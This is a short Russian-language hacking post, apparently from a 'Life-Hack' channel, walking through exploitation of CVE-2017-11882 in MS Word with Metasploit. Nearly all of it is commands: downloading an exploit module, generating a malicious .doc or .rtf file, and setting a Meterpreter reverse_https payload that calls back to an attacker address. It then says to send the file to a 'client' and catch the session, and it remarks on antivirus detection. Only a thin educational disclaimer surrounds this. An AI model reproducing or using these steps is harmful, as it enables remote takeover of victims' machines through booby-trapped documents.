CVE-2017-11882 MS Word Metasploit

CVE-2017-11882 MS Word Metasploit

Life-Hack

Добрый день мы уже писали о этом.

Мы рассмотрим альтернативный вариант через Metasploit:

Скачаем и перенесём експлоит

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

Запускаем metasploit и выбираем наш модуль.

service postgresql start
msfconsole
use exploit/windows/fileformat/office_ms17_11882

Просмотрим информацию о модуле

info

Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?

Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой

set FILENAME /root/exp.doc

Можно поставить и *.rtf, отработает и так и так.

Добавляем пейлоад и запускаем

set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit

Собственно, всё.

Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).

Запускаем, ловим сессию.

AV так же не стоит на месте

На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)

Информация дана для ознакомления, спасибо за внимание)

Альтернативный вариант пост эксплуатации через Empire Powershell

Источник



Report Page